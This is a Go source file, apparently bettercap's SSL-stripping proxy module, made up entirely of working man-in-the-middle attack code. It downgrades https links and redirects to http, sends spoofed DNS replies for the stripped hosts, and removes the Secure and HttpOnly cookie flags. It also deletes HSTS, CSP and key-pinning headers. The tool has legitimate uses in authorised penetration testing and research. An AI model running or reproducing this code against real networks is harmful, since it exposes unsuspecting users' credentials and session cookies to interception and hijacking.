http_proxy_base_sslstriper.go 8.6 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295
  1. package http_proxy
  2. import (
  3. "io/ioutil"
  4. "net/http"
  5. "net/url"
  6. "regexp"
  7. "strconv"
  8. "strings"
  9. "github.com/bettercap/bettercap/log"
  10. "github.com/bettercap/bettercap/modules/dns_spoof"
  11. "github.com/bettercap/bettercap/network"
  12. "github.com/bettercap/bettercap/session"
  13. "github.com/elazarl/goproxy"
  14. "github.com/google/gopacket"
  15. "github.com/google/gopacket/layers"
  16. "github.com/google/gopacket/pcap"
  17. "github.com/evilsocket/islazy/tui"
  18. "golang.org/x/net/idna"
  19. )
  20. var (
  21. httpsLinksParser = regexp.MustCompile(`https://[^"'/]+`)
  22. domainCookieParser = regexp.MustCompile(`; ?(?i)domain=.*(;|$)`)
  23. flagsCookieParser = regexp.MustCompile(`; ?(?i)(secure|httponly)`)
  24. )
  25. type SSLStripper struct {
  26. enabled bool
  27. session *session.Session
  28. cookies *CookieTracker
  29. hosts *HostTracker
  30. handle *pcap.Handle
  31. pktSourceChan chan gopacket.Packet
  32. }
  33. func NewSSLStripper(s *session.Session, enabled bool) *SSLStripper {
  34. strip := &SSLStripper{
  35. enabled: false,
  36. cookies: NewCookieTracker(),
  37. hosts: NewHostTracker(),
  38. session: s,
  39. handle: nil,
  40. }
  41. strip.Enable(enabled)
  42. return strip
  43. }
  44. func (s *SSLStripper) Enabled() bool {
  45. return s.enabled
  46. }
  47. func (s *SSLStripper) onPacket(pkt gopacket.Packet) {
  48. typeEth := pkt.Layer(layers.LayerTypeEthernet)
  49. typeUDP := pkt.Layer(layers.LayerTypeUDP)
  50. if typeEth == nil || typeUDP == nil {
  51. return
  52. }
  53. eth := typeEth.(*layers.Ethernet)
  54. dns, parsed := pkt.Layer(layers.LayerTypeDNS).(*layers.DNS)
  55. if parsed && dns.OpCode == layers.DNSOpCodeQuery && len(dns.Questions) > 0 && len(dns.Answers) == 0 {
  56. udp := typeUDP.(*layers.UDP)
  57. for _, q := range dns.Questions {
  58. domain := string(q.Name)
  59. original := s.hosts.Unstrip(domain)
  60. if original != nil && original.Address != nil {
  61. redir, who := dns_spoof.DnsReply(s.session, 1024, pkt, eth, udp, domain, original.Address, dns, eth.SrcMAC)
  62. if redir != "" && who != "" {
  63. log.Debug("[%s] Sending spoofed DNS reply for %s %s to %s.", tui.Green("dns"), tui.Red(domain), tui.Dim(redir), tui.Bold(who))
  64. }
  65. }
  66. }
  67. }
  68. }
  69. func (s *SSLStripper) Enable(enabled bool) {
  70. s.enabled = enabled
  71. if enabled && s.handle == nil {
  72. var err error
  73. if s.handle, err = network.Capture(s.session.Interface.Name()); err != nil {
  74. panic(err)
  75. }
  76. if err = s.handle.SetBPFFilter("udp"); err != nil {
  77. panic(err)
  78. }
  79. go func() {
  80. defer func() {
  81. s.handle.Close()
  82. s.handle = nil
  83. }()
  84. for s.enabled {
  85. src := gopacket.NewPacketSource(s.handle, s.handle.LinkType())
  86. s.pktSourceChan = src.Packets()
  87. for packet := range s.pktSourceChan {
  88. if !s.enabled {
  89. break
  90. }
  91. s.onPacket(packet)
  92. }
  93. }
  94. }()
  95. }
  96. }
  97. func (s *SSLStripper) isContentStrippable(res *http.Response) bool {
  98. for name, values := range res.Header {
  99. for _, value := range values {
  100. if name == "Content-Type" {
  101. return strings.HasPrefix(value, "text/") || strings.Contains(value, "javascript")
  102. }
  103. }
  104. }
  105. return false
  106. }
  107. func (s *SSLStripper) stripURL(url string) string {
  108. return strings.Replace(url, "https://", "http://", 1)
  109. }
  110. // sslstrip preprocessing, takes care of:
  111. //
  112. // - handling stripped domains
  113. // - making unknown session cookies expire
  114. func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redir *http.Response) {
  115. if !s.enabled {
  116. return
  117. }
  118. // handle stripped domains
  119. original := s.hosts.Unstrip(req.Host)
  120. if original != nil {
  121. log.Info("[%s] Replacing host %s with %s in request from %s and transmitting HTTPS", tui.Green("sslstrip"), tui.Bold(req.Host), tui.Yellow(original.Hostname), req.RemoteAddr)
  122. req.Host = original.Hostname
  123. req.URL.Host = original.Hostname
  124. req.Header.Set("Host", original.Hostname)
  125. req.URL.Scheme = "https"
  126. }
  127. if !s.cookies.IsClean(req) {
  128. // check if we need to redirect the user in order
  129. // to make unknown session cookies expire
  130. log.Info("[%s] Sending expired cookies for %s to %s", tui.Green("sslstrip"), tui.Yellow(req.Host), req.RemoteAddr)
  131. s.cookies.Track(req)
  132. redir = s.cookies.Expire(req)
  133. }
  134. return
  135. }
  136. func (s *SSLStripper) fixCookies(res *http.Response) {
  137. origHost := res.Request.URL.Hostname()
  138. strippedHost := s.hosts.Strip(origHost)
  139. if strippedHost != nil && strippedHost.Hostname != origHost && res.Header["Set-Cookie"] != nil {
  140. // get domains from hostnames
  141. if origParts, strippedParts := strings.Split(origHost, "."), strings.Split(strippedHost.Hostname, "."); len(origParts) > 1 && len(strippedParts) > 1 {
  142. origDomain := origParts[len(origParts)-2] + "." + origParts[len(origParts)-1]
  143. strippedDomain := strippedParts[len(strippedParts)-2] + "." + strippedParts[len(strippedParts)-1]
  144. log.Info("[%s] Fixing cookies on %s", tui.Green("sslstrip"), tui.Bold(strippedHost.Hostname))
  145. cookies := make([]string, len(res.Header["Set-Cookie"]))
  146. // replace domain and strip "secure" flag for each cookie
  147. for i, cookie := range res.Header["Set-Cookie"] {
  148. domainIndex := domainCookieParser.FindStringIndex(cookie)
  149. if domainIndex != nil {
  150. cookie = cookie[:domainIndex[0]] + strings.Replace(cookie[domainIndex[0]:domainIndex[1]], origDomain, strippedDomain, 1) + cookie[domainIndex[1]:]
  151. }
  152. cookies[i] = flagsCookieParser.ReplaceAllString(cookie, "")
  153. }
  154. res.Header["Set-Cookie"] = cookies
  155. s.cookies.Track(res.Request)
  156. }
  157. }
  158. }
  159. func (s *SSLStripper) fixResponseHeaders(res *http.Response) {
  160. res.Header.Del("Content-Security-Policy-Report-Only")
  161. res.Header.Del("Content-Security-Policy")
  162. res.Header.Del("Strict-Transport-Security")
  163. res.Header.Del("Public-Key-Pins")
  164. res.Header.Del("Public-Key-Pins-Report-Only")
  165. res.Header.Del("X-Frame-Options")
  166. res.Header.Del("X-Content-Type-Options")
  167. res.Header.Del("X-WebKit-CSP")
  168. res.Header.Del("X-Content-Security-Policy")
  169. res.Header.Del("X-Download-Options")
  170. res.Header.Del("X-Permitted-Cross-Domain-Policies")
  171. res.Header.Del("X-Xss-Protection")
  172. res.Header.Set("Allow-Access-From-Same-Origin", "*")
  173. res.Header.Set("Access-Control-Allow-Origin", "*")
  174. res.Header.Set("Access-Control-Allow-Methods", "*")
  175. res.Header.Set("Access-Control-Allow-Headers", "*")
  176. }
  177. func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
  178. if !s.enabled {
  179. return
  180. }
  181. s.fixResponseHeaders(res)
  182. orig := res.Request.URL
  183. origHost := orig.Hostname()
  184. // is the server redirecting us?
  185. if res.StatusCode != 200 {
  186. // extract Location header
  187. if location, err := res.Location(); location != nil && err == nil {
  188. newHost := location.Host
  189. newURL := location.String()
  190. // are we getting redirected from http to https?
  191. if orig.Scheme == "http" && location.Scheme == "https" {
  192. log.Info("[%s] Got redirection from HTTP to HTTPS: %s -> %s", tui.Green("sslstrip"), tui.Yellow("http://"+origHost), tui.Bold("https://"+newHost))
  193. // strip the URL down to an alternative HTTP version and save it to an ASCII Internationalized Domain Name
  194. strippedURL := s.stripURL(newURL)
  195. parsed, _ := url.Parse(strippedURL)
  196. hostStripped := parsed.Hostname()
  197. hostStripped, _ = idna.ToASCII(hostStripped)
  198. s.hosts.Track(newHost, hostStripped)
  199. res.Header.Set("Location", strippedURL)
  200. }
  201. }
  202. }
  203. // if we have a text or html content type, fetch the body
  204. // and perform sslstripping
  205. if s.isContentStrippable(res) {
  206. raw, err := ioutil.ReadAll(res.Body)
  207. if err != nil {
  208. log.Error("Could not read response body: %s", err)
  209. return
  210. }
  211. body := string(raw)
  212. urls := make(map[string]string)
  213. matches := httpsLinksParser.FindAllString(body, -1)
  214. for _, u := range matches {
  215. // make sure we only strip valid URLs
  216. if parsed, _ := url.Parse(u); parsed != nil {
  217. // strip the URL down to an alternative HTTP version
  218. urls[u] = s.stripURL(u)
  219. }
  220. }
  221. nurls := len(urls)
  222. if nurls > 0 {
  223. plural := "s"
  224. if nurls == 1 {
  225. plural = ""
  226. }
  227. log.Info("[%s] Stripping %d SSL link%s from %s", tui.Green("sslstrip"), nurls, plural, tui.Bold(res.Request.Host))
  228. }
  229. for u, stripped := range urls {
  230. log.Debug("Stripping url %s to %s", tui.Bold(u), tui.Yellow(stripped))
  231. body = strings.Replace(body, u, stripped, -1)
  232. // save stripped host to an ASCII Internationalized Domain Name
  233. parsed, _ := url.Parse(u)
  234. hostOriginal := parsed.Hostname()
  235. parsed, _ = url.Parse(stripped)
  236. hostStripped := parsed.Hostname()
  237. hostStripped, _ = idna.ToASCII(hostStripped)
  238. s.hosts.Track(hostOriginal, hostStripped)
  239. }
  240. res.Header.Set("Content-Length", strconv.Itoa(len(body)))
  241. // fix cookies domain + strip "secure" + "httponly" flags
  242. s.fixCookies(res)
  243. // reset the response body to the original unread state
  244. // but with just a string reader, this way further calls
  245. // to ioutil.ReadAll(res.Body) will just return the content
  246. // we stripped without downloading anything again.
  247. res.Body = ioutil.NopCloser(strings.NewReader(body))
  248. }
  249. }